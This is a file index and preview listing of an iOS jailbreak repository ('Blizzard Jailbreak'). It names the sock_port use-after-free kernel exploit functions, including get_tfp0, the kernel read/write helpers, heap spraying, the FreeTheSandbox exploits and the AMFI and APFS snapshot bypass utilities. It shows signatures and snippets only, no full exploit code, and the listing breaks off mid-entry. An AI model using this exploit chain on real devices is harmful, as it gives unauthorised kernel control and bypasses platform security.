function get_minmtu (line 17) | int get_minmtu(int sock, int *minmtu) {
function get_prefertempaddr (line 22) | int get_prefertempaddr(int sock, int *prefertempaddr) {
function set_prefertempaddr (line 27) | int set_prefertempaddr(int sock, int *prefertempaddr) {
function get_pktinfo (line 31) | int get_pktinfo(int sock, struct in6_pktinfo *pktinfo) {
function set_pktinfo (line 36) | int set_pktinfo(int sock, struct in6_pktinfo *pktinfo) {
function free_socket_options (line 41) | int free_socket_options(int sock) {
function get_socket (line 46) | int get_socket() {
function get_socket_with_dangling_options (line 65) | int get_socket_with_dangling_options() {
function mach_port_t (line 76) | mach_port_t new_port() {
function find_port_via_uaf (line 92) | uint64_t find_port_via_uaf(mach_port_t port, int disposition) {
function task_self_addr (line 121) | uint64_t task_self_addr() {
type ip6_pktopts (line 136) | struct ip6_pktopts
type ip6_pktopts (line 136) | struct ip6_pktopts
type in6_pktinfo (line 139) | struct in6_pktinfo
type ip6_pktopts (line 145) | struct ip6_pktopts
type in6_pktinfo (line 172) | struct in6_pktinfo
type in6_pktinfo (line 173) | struct in6_pktinfo
function rk64_via_uaf (line 179) | uint64_t rk64_via_uaf(uint64_t addr) {
function free_via_uaf (line 190) | int free_via_uaf(uint64_t addr) {
function mach_port_waitq_flags (line 242) | static inline uint32_t mach_port_waitq_flags() {
function mach_port_t (line 254) | mach_port_t get_tfp0() {
FILE: Exploits/sock_port/exploit.h
type route_in6 (line 28) | struct route_in6 {
type ip6po_rhinfo (line 36) | struct ip6po_rhinfo {
type ip6po_nhinfo (line 41) | struct ip6po_nhinfo {
type ip6_pktopts (line 46) | struct ip6_pktopts {
type kport_t (line 67) | typedef volatile struct {
type ktask_t (line 108) | typedef struct {
FILE: Exploits/sock_port/exploit_utilities.c
function mach_port_t (line 12) | mach_port_t fill_kalloc_with_port_pointer(mach_port_t target_port, int c...
function message_size_for_kalloc_size (line 60) | size_t message_size_for_kalloc_size(size_t kalloc_size) {
function mach_port_t (line 65) | mach_port_t send_kalloc_message(uint8_t *replacer_message_body, uint32_t...
function trigger_gc (line 116) | void trigger_gc() {
function init_IOSurface (line 154) | int init_IOSurface() {
function deinit_IOSurface (line 166) | void deinit_IOSurface() {
function spray_IOSurface (line 170) | int spray_IOSurface(void *data, size_t size) {
FILE: Exploits/sock_port/exploit_utilities.h
type ool_msg (line 23) | struct ool_msg {
type simple_msg (line 29) | struct simple_msg {
FILE: Exploits/sock_port/include/IOKit/IOKitLib.h
type IONotificationPort (line 64) | struct IONotificationPort
type IOObject (line 1258) | typedef struct IOObject IOObject;
FILE: Exploits/sock_port/include/IOKit/IOReturn.h
type kern_return_t (line 45) | typedef kern_return_t IOReturn;
FILE: Exploits/sock_port/include/IOKit/IOTypes.h
type UInt32 (line 72) | typedef UInt32 IOOptionBits;
type SInt32 (line 73) | typedef SInt32 IOFixed;
type UInt32 (line 74) | typedef UInt32 IOVersion;
type UInt32 (line 75) | typedef UInt32 IOItemCount;
type UInt32 (line 76) | typedef UInt32 IOCacheMode;
type UInt32 (line 78) | typedef UInt32 IOByteCount32;
type UInt64 (line 79) | typedef UInt64 IOByteCount64;
type UInt32 (line 81) | typedef UInt32 IOPhysicalAddress32;
type UInt64 (line 82) | typedef UInt64 IOPhysicalAddress64;
type UInt32 (line 83) | typedef UInt32 IOPhysicalLength32;
type UInt64 (line 84) | typedef UInt64 IOPhysicalLength64;
type mach_vm_address_t (line 87) | typedef mach_vm_address_t IOVirtualAddress;
type vm_address_t (line 89) | typedef vm_address_t IOVirtualAddress;
type IOByteCount64 (line 93) | typedef IOByteCount64 IOByteCount;
type IOByteCount32 (line 95) | typedef IOByteCount32 IOByteCount;
type IOVirtualAddress (line 98) | typedef IOVirtualAddress IOLogicalAddress;
type IOPhysicalAddress64 (line 102) | typedef IOPhysicalAddress64 IOPhysicalAddress;
type IOPhysicalLength64 (line 103) | typedef IOPhysicalLength64 IOPhysicalLength;
type IOPhysicalAddress32 (line 109) | typedef IOPhysicalAddress32 IOPhysicalAddress;
type IOPhysicalLength32 (line 110) | typedef IOPhysicalLength32 IOPhysicalLength;
type IOPhysicalRange (line 117) | typedef struct
type IOVirtualRange (line 123) | typedef struct
type IOVirtualRange (line 130) | typedef IOVirtualRange IOAddressRange;
type IOAddressRange (line 132) | typedef struct
type IONamedValue (line 142) | typedef struct {
type IOAlignment (line 151) | typedef unsigned int IOAlignment;
type OSObject (line 167) | struct OSObject
type mach_port_t (line 169) | typedef mach_port_t io_object_t;
type io_object_t (line 175) | typedef io_object_t io_connect_t;
type io_object_t (line 176) | typedef io_object_t io_enumerator_t;
type io_object_t (line 177) | typedef io_object_t io_iterator_t;
type io_object_t (line 178) | typedef io_object_t io_registry_entry_t;
type io_object_t (line 179) | typedef io_object_t io_service_t;
type IODeviceNumber (line 242) | typedef unsigned int IODeviceNumber;
FILE: Exploits/sock_port/include/IOKit/OSMessageNotification.h
type natural_t (line 78) | typedef natural_t OSAsyncReference[kOSAsyncRefCount];
type OSNotificationHeader (line 80) | struct OSNotificationHeader {
type IOServiceInterestContent (line 92) | struct IOServiceInterestContent {
type IOAsyncCompletionContent (line 97) | struct IOAsyncCompletionContent {
type OSNotificationHeader (line 107) | typedef struct OSNotificationHeader OSNotificationHeader;
type IOServiceInterestContent (line 108) | typedef struct IOServiceInterestContent IOServiceInterestContent;
type IOAsyncCompletionContent (line 109) | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent;
FILE: Exploits/sock_port/iosurface.c
function IOSurface_init (line 16) | bool
function IOSurface_deinit (line 61) | void
function IOSurface_set_value (line 76) | bool
function IOSurface_get_value (line 100) | static bool
function IOSurface_remove_value (line 123) | static bool
function base255_encode (line 147) | static uint32_t
function xml_units_for_data_size (line 163) | static size_t
function serialize_IOSurface_data_array (line 175) | static size_t
function IOSurface_spray_with_gc_internal (line 202) | static bool
function IOSurface_spray_with_gc (line 286) | bool
function IOSurface_spray_size_with_gc (line 294) | bool
function IOSurface_spray_read_array (line 308) | bool
function IOSurface_spray_read_all_data (line 364) | bool
function IOSurface_spray_remove_array (line 382) | bool
function IOSurface_spray_clear (line 392) | bool
FILE: Exploits/sock_port/iosurface.h
type _IOSurfaceFastCreateArgs (line 110) | struct _IOSurfaceFastCreateArgs {
type IOSurfaceLockResult (line 120) | struct IOSurfaceLockResult {
type IOSurfaceValueArgs (line 128) | struct IOSurfaceValueArgs {
type IOSurfaceValueArgs_string (line 137) | struct IOSurfaceValueArgs_string {
type IOSurfaceValueResultArgs (line 144) | struct IOSurfaceValueResultArgs {
type IOSurfaceValueArgs (line 149) | struct IOSurfaceValueArgs
FILE: Exploits/sock_port/kernel_memory.c
function init_kernel_memory (line 13) | void init_kernel_memory(mach_port_t tfp0) {
function kalloc (line 17) | uint64_t kalloc(vm_size_t size) {
function kfree (line 23) | void kfree(mach_vm_address_t address, vm_size_t size) {
function kread (line 27) | size_t kread(uint64_t where, void *p, size_t size) {
function rk32 (line 45) | uint32_t rk32(uint64_t where) {
function rk64 (line 51) | uint64_t rk64(uint64_t where) {
function kwrite (line 57) | size_t kwrite(uint64_t where, const void *p, size_t size) {
function wk32 (line 75) | void wk32(uint64_t where, uint32_t what) {
function wk64 (line 81) | void wk64(uint64_t where, uint64_t what) {
function find_port (line 86) | uint64_t find_port(mach_port_name_t port, uint64_t task_self) {
FILE: Exploits/sock_port/offsets.h
type kstruct_offset (line 4) | enum kstruct_offset {
type kstruct_offset (line 53) | enum kstruct_offset
FILE: Kernel Utilities/kernSymbolication.c
function find_symbol (line 23) | uint64_t find_symbol(const char *symbol, bool verbose) {
function find_macho_header (line 128) | uint32_t find_macho_header() {
function decompressKernelCache (line 138) | int decompressKernelCache(const char *kernelcache) {
FILE: Kernel Utilities/kernSymbolication.h
type symbol (line 22) | struct symbol {
FILE: Kernel Utilities/kernel_utils.h
type kmap_hdr_t (line 46) | typedef struct {
FILE: Kernel Utilities/kexecute.c
function mach_port_t (line 12) | mach_port_t PrepareUserClient(void){
function initializeKernelExecute (line 37) | void initializeKernelExecute(void) {
function terminateKernelExecute (line 64) | void terminateKernelExecute(void){
function kexecute (line 71) | uint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, ...
FILE: Kernel Utilities/lzssdec.cpp
class lzssdecompress (line 25) | class lzssdecompress
method lzssdecompress (line 49) | lzssdecompress()
method reset (line 63) | void reset()
method decompress (line 76) | void decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uin...
method flush (line 125) | void flush(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused)
method copyfromdict (line 137) | void copyfromdict()
method dumpcopydata (line 149) | void dumpcopydata()
method addtodict (line 156) | void addtodict(uint8_t c)
method nextflagbit (line 161) | void nextflagbit()
method setcounter (line 167) | void setcounter(uint8_t first, uint8_t second)
function usage (line 174) | void usage(int argc,char**argv)
function lzssdec (line 180) | int lzssdec(int argc,char**argv)
FILE: PatchFinder/patchfinder64.h
type addr_t (line 7) | typedef unsigned long long addr_t;
Condensed preview — 102 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (892K chars).
[
{
"path": ".gitignore",
"chars": 10,
"preview": ".DS_Store\n"
},
{
"path": "AMFI Utilities/amfi_utils.h",
"chars": 943,
"preview": "#import <stdio.h>\n#import <sys/types.h>\n#import \"../AMFI Utilities/cs_blob.h\"\n\n#define MACHO(p) ((*(unsigned int *)(p) &"
},
{
"path": "AMFI Utilities/amfi_utils.m",
"chars": 15027,
"preview": "// Comes from Electra, adapted for FAT binary support by Jake James\n//\n// amfi_utils.c\n// electra\n//\n// Created by J"
},
{
"path": "AMFI Utilities/amfid.h",
"chars": 1025,
"preview": "#import <dlfcn.h>\n#import <stdio.h>\n#import <unistd.h>\n#import <sys/types.h>\n#import <mach/mach.h>\n#import <mach-o/loade"
},
{
"path": "AMFI Utilities/amfid.m",
"chars": 10116,
"preview": "// From JelbrekLib, by Jake James!\n\n#import \"../AMFI Utilities/amfid.h\"\n#import \"../AMFI Utilities/amfid_mem.h\"\n#import "
},
{
"path": "AMFI Utilities/amfid_mem.h",
"chars": 454,
"preview": "#import <stdio.h>\n#import <mach-o/loader.h>\n#import <stdlib.h>\n#import <fcntl.h>\n#import <unistd.h>\n#import <errno.h>\n#i"
},
{
"path": "AMFI Utilities/amfid_mem.m",
"chars": 1402,
"preview": "#import \"amfid_mem.h\"\n#import \"kernel_utils.h\"\n#import <Foundation/Foundation.h>\n\nstatic mach_port_t amfid_task_port;\n\nv"
},
{
"path": "AMFI Utilities/amfid_tools.h",
"chars": 497,
"preview": "#import <stdio.h>\n#import <unistd.h>\n#import <sys/types.h>\n#import <mach-o/loader.h>\n#import <mach/error.h>\n#import <err"
},
{
"path": "AMFI Utilities/amfid_tools.m",
"chars": 2261,
"preview": "#import \"amfid_tools.h\"\n#import \"amfi_utils.h\"\n#import \"amfid.h\"\n\nstatic unsigned int hash_rank(const CodeDirectory *cd)"
},
{
"path": "AMFI Utilities/cs_blob.h",
"chars": 9611,
"preview": "//from: xnu osfmk/kern/cs_blobs.h\n\n#import <mach/mach.h>\n\ntypedef struct __attribute__((packed)) {\n uint32_t magic; "
},
{
"path": "AMFI Utilities/osobject.c",
"chars": 4363,
"preview": "#import <stdlib.h>\n#import \"../Kernel Utilities/kexecute.h\"\n#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../Pat"
},
{
"path": "AMFI Utilities/osobject.h",
"chars": 1099,
"preview": "#include \"../Exploits/sock_port/kernel_memory.h\"\n\n#define OSDictionary_ItemCount(dict) rk32(dict+20)\n#define OSDictionar"
},
{
"path": "APFS Utilities/IOKit.h",
"chars": 2399,
"preview": "//\n// IOKit.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 08/10/2020.\n// Copyright © 2020 Blizzard Jailbreak. "
},
{
"path": "APFS Utilities/liboffsetfinder64.hpp",
"chars": 6264,
"preview": "//\n// offsetfinder64.hpp\n// offsetfinder64\n//\n// Created by tihmstar on 10.01.18.\n// Copyright © 2018 tihmstar. All "
},
{
"path": "APFS Utilities/offsetfinder.cpp",
"chars": 1692,
"preview": "// Based on tihmstar's liboffsetfinder64 which is open source here:\n// https://github.com/tihmstar/liboffsetfinder64\n// "
},
{
"path": "APFS Utilities/rootfs_remount.h",
"chars": 562,
"preview": "//\n// rootfs_remount.h\n// electra1131\n//\n// Created by CoolStar on 6/7/18.\n// Copyright © 2018 CoolStar. All rights "
},
{
"path": "APFS Utilities/rootfs_remount.m",
"chars": 11621,
"preview": "// Thanks to the Electra Team and Pwn20wnd!\n/* APFS snapshot mitigation bypass bug by CoolStar, exploitation by Pwn20wnd"
},
{
"path": "APFS Utilities/snapshot_tools.c",
"chars": 5738,
"preview": "#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/off"
},
{
"path": "APFS Utilities/snapshot_tools.h",
"chars": 611,
"preview": "#ifndef apfs_util_h\n#define apfs_util_h\n\n#define get_dirfd(vol) open(vol, O_RDONLY, 0)\n\nchar *find_snapshot_with_ref(con"
},
{
"path": "Blizzard Jailbreak/AppDelegate.h",
"chars": 277,
"preview": "//\n// AppDelegate.h\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights "
},
{
"path": "Blizzard Jailbreak/AppDelegate.m",
"chars": 1973,
"preview": "//\n// AppDelegate.m\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights "
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/AppIcon.appiconset/Contents.json",
"chars": 3147,
"preview": "{\n \"images\" : [\n {\n \"size\" : \"20x20\",\n \"idiom\" : \"iphone\",\n \"filename\" : \"notification-icon@2x.png\",\n"
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/Contents.json",
"chars": 62,
"preview": "{\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}"
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/button_mask.imageset/Contents.json",
"chars": 388,
"preview": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"button_mask.png\",\n \"scale\" : \"1x\"\n },\n "
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/jailbreak_wallpaper.imageset/Contents.json",
"chars": 412,
"preview": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"jailbreak_wallpaper.png\",\n \"scale\" : \"1x\"\n "
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/snow.imageset/Contents.json",
"chars": 367,
"preview": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"snow.png\",\n \"scale\" : \"1x\"\n },\n {\n "
},
{
"path": "Blizzard Jailbreak/Assets.xcassets/winter.imageset/Contents.json",
"chars": 373,
"preview": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"winter.png\",\n \"scale\" : \"1x\"\n },\n {\n "
},
{
"path": "Blizzard Jailbreak/Base.lproj/LaunchScreen.storyboard",
"chars": 4430,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<document type=\"com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB\" version=\"3"
},
{
"path": "Blizzard Jailbreak/Base.lproj/Main.storyboard",
"chars": 39830,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<document type=\"com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB\" version=\"3"
},
{
"path": "Blizzard Jailbreak/BlizzardLog.h",
"chars": 462,
"preview": "//\n// BlizzardLog.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All righ"
},
{
"path": "Blizzard Jailbreak/BlizzardLog.m",
"chars": 6215,
"preview": "//\n// BlizzardLog.m\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All righ"
},
{
"path": "Blizzard Jailbreak/BlizzardSpawnerTools.c",
"chars": 938,
"preview": "//\n// BlizzardSpawnerTools.c\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w."
},
{
"path": "Blizzard Jailbreak/BlizzardSpawnerTools.h",
"chars": 385,
"preview": "//\n// BlizzardSpawnerTools.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w."
},
{
"path": "Blizzard Jailbreak/Info.plist",
"chars": 1592,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "Blizzard Jailbreak/blizzardJailbreak.h",
"chars": 785,
"preview": "//\n// blizzardJailbreak.h\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n"
},
{
"path": "Blizzard Jailbreak/blizzardJailbreak.m",
"chars": 10319,
"preview": "//\n// blizzardJailbreak.c\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n#"
},
{
"path": "Blizzard Jailbreak/blizzardView.h",
"chars": 422,
"preview": "//\n// blizzardView.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rig"
},
{
"path": "Blizzard Jailbreak/blizzardView.m",
"chars": 1489,
"preview": "//\n// blizzardView.m\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rig"
},
{
"path": "Blizzard Jailbreak/main.m",
"chars": 334,
"preview": "//\n// main.m\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights reserve"
},
{
"path": "Blizzard Jailbreak.xcodeproj/project.pbxproj",
"chars": 53769,
"preview": "// !$*UTF8*$!\n{\n\tarchiveVersion = 1;\n\tclasses = {\n\t};\n\tobjectVersion = 48;\n\tobjects = {\n\n/* Begin PBXBuildFile section *"
},
{
"path": "Blizzard Jailbreak.xcodeproj/project.xcworkspace/contents.xcworkspacedata",
"chars": 208,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Workspace\n version = \"1.0\">\n <FileRef\n location = \"self:/Users/geosn0w/"
},
{
"path": "Blizzard Jailbreak.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist",
"chars": 238,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcshareddata/xcschemes/sock_port.xcscheme",
"chars": 4365,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Scheme\n LastUpgradeVersion = \"1010\"\n version = \"1.3\">\n <BuildAction\n "
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcuserdata/geosn0w.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist",
"chars": 91,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Bucket\n type = \"1\"\n version = \"2.0\">\n</Bucket>\n"
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist",
"chars": 2112,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Bucket\n type = \"1\"\n version = \"2.0\">\n <Breakpoints>\n <BreakpointProxy"
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist",
"chars": 334,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "Blizzard Jailbreak.xcodeproj/xcuserdata/pwn20wnd.xcuserdatad/xcschemes/xcschememanagement.plist",
"chars": 673,
"preview": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/P"
},
{
"path": "Exploits/FreeTheSandbox/IOTypes.h",
"chars": 7079,
"preview": "/*\n * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/FreeTheSandbox/freethesandbox.h",
"chars": 253,
"preview": "//\n// freethesandbox.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 11/20/20.\n// Copyright © 2020 GeoSn0w. All "
},
{
"path": "Exploits/FreeTheSandbox/ios13_change_offsets.m",
"chars": 18519,
"preview": "//\n// ios13_change_offsets.c\n// ios13_app1\n//\n// Created by bb on 1/25/20.\n// Copyright © 2020 bb. All rights reserv"
},
{
"path": "Exploits/FreeTheSandbox/ios13_kernel_universal.c",
"chars": 115429,
"preview": "//\n// ios13_kernel_universal.c\n// ios13_app1\n//\n// Created by bb on 1/12/20.\n// Copyright © 2020 bb. All rights rese"
},
{
"path": "Exploits/FreeTheSandbox/ios13_userspace.c",
"chars": 42515,
"preview": "//\n// ios13_userspace.c\n// ios13_app1\n//\n// Created by bb on 1/12/20.\n// Copyright © 2020 bb. All rights reserved.\n/"
},
{
"path": "Exploits/FreeTheSandbox/ios13_userspace_pac.c",
"chars": 37421,
"preview": "//\n// ios13_userspace_pac.c\n// ios13_app1\n//\n// Created by bb on 1/12/20.\n// Copyright © 2020 bb. All rights reserve"
},
{
"path": "Exploits/FreeTheSandbox/ios_7st_utils.m",
"chars": 4573,
"preview": "//\n// ios_7st_utils.c\n// ios_7st_test\n//\n// Created by bb on 12/26/19.\n// Copyright © 2019 bb. All rights reserved.\n"
},
{
"path": "Exploits/FreeTheSandbox/libsnappy.c",
"chars": 5260,
"preview": "//\n// libsnappy.c\n// ios_7st_test\n//\n// Created by bb on 1/20/20.\n// Copyright © 2020 bb. All rights reserved.\n//\n\n/"
},
{
"path": "Exploits/FreeTheSandbox/libsnappy.h",
"chars": 340,
"preview": "//\n// libsnappy.h\n// ios_7st_test\n//\n// Created by bb on 1/20/20.\n// Copyright © 2020 bb. All rights reserved.\n//\n\n/"
},
{
"path": "Exploits/FreeTheSandbox/vnode.h",
"chars": 3661,
"preview": "#import <sys/mount.h>\n#import <sys/event.h>\n\ntypedef struct {\n union {\n uint64_t lck_mtx_data;\n uint64_"
},
{
"path": "Exploits/FreeTheSandbox/xpc.h",
"chars": 2658,
"preview": "//\n// xpc.h\n// D22_final_iOS\n//\n// Created by aa on 3/23/19.\n// Copyright © 2019 aa. All rights reserved.\n//\n\n#ifnde"
},
{
"path": "Exploits/IOKit/IOKitKeys.h",
"chars": 7728,
"preview": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/IOKit/IOKitLib.h",
"chars": 86627,
"preview": "/*\n * Copyright (c) 1998-2014 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n *\n * This fi"
},
{
"path": "Exploits/IOKit/IOReturn.h",
"chars": 8101,
"preview": "/*\n * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/IOKit/IOTypes.h",
"chars": 7079,
"preview": "/*\n * Copyright (c) 1998-2012 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/sock_port/exploit.c",
"chars": 20671,
"preview": "//\n// exploit.c\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights rese"
},
{
"path": "Exploits/sock_port/exploit.h",
"chars": 3454,
"preview": "//\n// exploit.h\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights rese"
},
{
"path": "Exploits/sock_port/exploit_utilities.c",
"chars": 5610,
"preview": "//\n// exploit_utilities.c\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All r"
},
{
"path": "Exploits/sock_port/exploit_utilities.h",
"chars": 2026,
"preview": "//\n// exploit_utilities.h\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All r"
},
{
"path": "Exploits/sock_port/include/IOKit/IOKitKeys.h",
"chars": 6749,
"preview": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/sock_port/include/IOKit/IOKitLib.h",
"chars": 68790,
"preview": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n * \n * The co"
},
{
"path": "Exploits/sock_port/include/IOKit/IOReturn.h",
"chars": 7526,
"preview": "/*\n * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/sock_port/include/IOKit/IOTypes.h",
"chars": 6038,
"preview": "/*\n * Copyright (c) 1998-2006 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "Exploits/sock_port/include/IOKit/OSMessageNotification.h",
"chars": 3086,
"preview": "/*\n * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_LICENSE_HEADER_START@\n * \n * This f"
},
{
"path": "Exploits/sock_port/iosurface.c",
"chars": 12616,
"preview": "/*\n * iosurface.c\n * Brandon Azad\n */\n#define IOSURFACE_EXTERN\n#include \"iosurface.h\"\n\n// ---- Global variables --------"
},
{
"path": "Exploits/sock_port/iosurface.h",
"chars": 3823,
"preview": "/*\n * iosurface.h\n * Brandon Azad\n */\n#ifndef VOUCHER_SWAP__IOSURFACE_H_\n#define VOUCHER_SWAP__IOSURFACE_H_\n\n#include <m"
},
{
"path": "Exploits/sock_port/kernel_memory.c",
"chars": 2548,
"preview": "//\n// kernel_memory.c\n// sock_port\n//\n// Created by Jake James on 7/18/19.\n// Copyright © 2019 Jake James. All right"
},
{
"path": "Exploits/sock_port/kernel_memory.h",
"chars": 1379,
"preview": "//\n// kernel_memory.h\n// sock_port\n//\n// Created by Jake James on 7/18/19.\n// Copyright © 2019 Jake James. All right"
},
{
"path": "Exploits/sock_port/offsetof.c",
"chars": 3354,
"preview": "unsigned off_p_pid = 0x10; // proc_t::p_pid\nunsigned off_task = 0x18; // proc_t::task\nunsig"
},
{
"path": "Exploits/sock_port/offsetof.h",
"chars": 3522,
"preview": "\nextern unsigned off_p_pid;\nextern unsigned off_task;\nextern unsigned off_p_uid;\nextern unsigned off_p_gid;\nextern unsig"
},
{
"path": "Exploits/sock_port/offsets.h",
"chars": 1438,
"preview": "#ifndef offsets_h\n#define offsets_h\n\nenum kstruct_offset {\n /* struct task */\n KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n "
},
{
"path": "Exploits/sock_port/offsets.m",
"chars": 7863,
"preview": "#import <Foundation/Foundation.h>\n#import <UIKit/UIKit.h>\n\n#import <stdio.h>\n#import <stdlib.h>\n#import <string.h>\n#impo"
},
{
"path": "Kernel Utilities/kernSymbolication.c",
"chars": 6412,
"preview": "//\n// kernelSymbolFinder.c\n// KernelSymbolFinder\n//\n// Created by Jake James on 8/21/18.\n// Copyright © 2018 Jake Ja"
},
{
"path": "Kernel Utilities/kernSymbolication.h",
"chars": 753,
"preview": "//\n// kernSymbolication.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w. Al"
},
{
"path": "Kernel Utilities/kernel_utils.h",
"chars": 2277,
"preview": "#ifndef kernUtils_h\n#define kernUtils_h\n#import <stdio.h>\n#import <mach-o/loader.h>\n#import <stdlib.h>\n#import <fcntl.h>"
},
{
"path": "Kernel Utilities/kernel_utils.m",
"chars": 12914,
"preview": "\n#import \"kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import \"."
},
{
"path": "Kernel Utilities/kexecute.c",
"chars": 3276,
"preview": "#import <pthread.h>\n#import \"kernel_utils.h\"\n#import \"kexecute.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../E"
},
{
"path": "Kernel Utilities/kexecute.h",
"chars": 240,
"preview": "#import <mach/mach.h>\n#import <inttypes.h>\n\nuint64_t kexecute(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2, uint"
},
{
"path": "Kernel Utilities/lzssdec.cpp",
"chars": 8042,
"preview": "//\n// lzssdec.cpp\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/11/20.\n// Copyright © 2020 GeoSn0w. All rights"
},
{
"path": "Kernel Utilities/lzssdec.hpp",
"chars": 336,
"preview": "//\n// lzssdec.hpp\n// KernelSymbolFinder\n//\n// Created by Jake James on 8/21/18.\n// Copyright © 2018 Jake James. All "
},
{
"path": "Kernel Utilities/system_reboot.h",
"chars": 6016,
"preview": "/*\n * Copyright (c) 2000-2006 Apple Computer, Inc. All rights reserved.\n *\n * @APPLE_OSREFERENCE_LICENSE_HEADER_START@\n "
},
{
"path": "LICENSE",
"chars": 35149,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
